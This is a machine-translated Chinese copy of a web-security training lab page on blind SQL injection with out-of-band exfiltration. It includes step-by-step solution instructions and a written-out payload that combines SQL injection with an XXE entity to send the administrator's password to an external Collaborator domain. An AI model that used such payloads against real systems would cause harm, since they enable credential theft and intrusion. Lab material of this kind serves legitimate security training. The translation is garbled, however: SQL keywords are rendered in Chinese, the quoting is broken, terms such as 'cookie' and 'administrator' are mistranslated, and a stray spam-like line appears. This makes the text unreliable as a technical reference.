实验室:带外数据剥落的盲SQL注入
从业者
这个实验室包含一个盲目注射脆弱性。该应用程序使用跟踪cookie进行分析,并执行包含已提交cookie的值的SQL查询。
SQL查询是异步执行的,对应用程序的响应没有影响。但是,您可以与外部域触发带外的交互。
该数据库包含一个名为的不同表用户
,列叫用户名
和密码
。您需要利用盲人SQL注入找出密码的漏洞行政人员
用户。
要解决实验室,请登录行政人员
用户。
学习路径
如果您正在关注我们的学习路径,请注意,该实验室的建议解决方案需要对我们尚未介绍的主题有所了解。不用担心您是否卡住;一旦您进一步发展知识,请稍后再回来。
笔记
为了防止用于攻击第三方的学院平台,我们的防火墙会阻止实验室和任意外部系统之间的交互。要解决实验室,您必须使用BURP协作者的默认公共服务器。
解决方案
- 访问商店的头版,并使用Burp Suite专业人士拦截和修改包含的请求
跟踪号码
曲奇饼。
- 转到Burp菜单,然后启动Burp合作者客户端。
- 单击“复制到剪贴板”,将独特的BURP协作者有效载荷复制到剪贴板。让Burp合作者客户端窗口打开。
修改跟踪号码
cookie,将其更改为有效负载,该有效负载将在与协作服务器的互动中泄漏管理员的密码。例如,您可以将SQL注入与基本注入相结合xxe技术如下:
trackingId = X'+Union+选择+ExtractValue(xmlType('<%3FXML+版本%%3D“ 1.0”+编码%3D“ utf-8”%%3F> <!doctype+root+root+[+<!entity+%25+%25+远程+系统+“ http%3A //'||(选择+密码+来自+用户+where+username%%3d'administrator')||'.burp-collaborator-subdomain/>+%25Remote%3B]>'>'),'/l')+来自+dual--
- 返回到Burp合作者客户端窗口,然后单击“立即进行民意调查”。如果您没有看到列出的任何交互,请等待几秒钟,然后重试,因为服务器端查询是异步执行的。
- 您应该查看该应用程序由于有效载荷而启动的一些DNS和HTTP交互。密码
行政人员
用户应出现在互动的子域中,您可以在Burp合作者客户端中查看此内容。对于DNS交互,在“描述”选项卡中显示了查找的完整域名。对于HTTP交互,完整的域名在“请求对协作者”选项卡中的主机标头中显示。
- 在浏览器中,单击“我的帐户”以打开登录页面。使用密码登录为
行政人员
用户。
社区解决方案beplay维护得多久
拉娜·哈利尔(Rana Khalil)
迈克尔·索默(Michael Sommer)